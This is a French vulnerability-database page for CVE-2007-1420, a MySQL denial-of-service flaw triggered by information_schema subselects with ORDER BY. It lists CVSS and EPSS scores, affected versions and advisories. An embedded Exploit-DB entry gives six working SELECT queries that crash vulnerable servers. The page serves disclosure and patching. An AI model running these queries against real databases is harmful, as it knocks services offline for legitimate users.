CVE-2007-1420 : Détail

CVE-2007-1420

2.67%V3
Local
2007-03-12
22h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29724

Date de publication : 2007-03-08 23h00 +00:00
Auteur : S.Streichsbier
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/22900/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata. An attacker can exploit this issue to crash the application, denying access to legitimate users. The attacker may also be able to execute arbitrary code, but this has not yet been confirmed. NOTE: An attacker must be able to execute arbitrary SELECT statements on the vulnerable computer to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities. Versions prior to 5.0.36 are vulnerable. SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1)); SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1); SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1)); SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.0.33

Mysql>>Mysql >> Version 5.0.0

Mysql>>Mysql >> Version 5.0.1

Mysql>>Mysql >> Version 5.0.2

Mysql>>Mysql >> Version 5.0.3

Mysql>>Mysql >> Version 5.0.4

Mysql>>Mysql >> Version 5.0.5

Mysql>>Mysql >> Version 5.0.10

Mysql>>Mysql >> Version 5.0.15

Mysql>>Mysql >> Version 5.0.16

Mysql>>Mysql >> Version 5.0.17

Mysql>>Mysql >> Version 5.0.20

Mysql>>Mysql >> Version 5.0.24

Mysql>>Mysql >> Version 5.0.30

Oracle>>Mysql >> Version 5.0.6

Oracle>>Mysql >> Version 5.0.7

Oracle>>Mysql >> Version 5.0.32

Oracle>>Mysql >> Version 5.0.41

Références

http://secunia.com/advisories/25196
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24609
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25389
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-440-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-200705-11.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://securityreason.com/securityalert/2413
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/25946
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/0908
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24483
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1017746
Tags : vdb-entry, x_refsource_SECTRACK
http://www.mandriva.com/security/advisories?name=MDKSA-2007:139
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/30351
Tags : third-party-advisory, x_refsource_SECUNIA
http://bugs.mysql.com/bug.php?id=24630
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/bid/22900
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2008-0364.html
Tags : vendor-advisory, x_refsource_REDHAT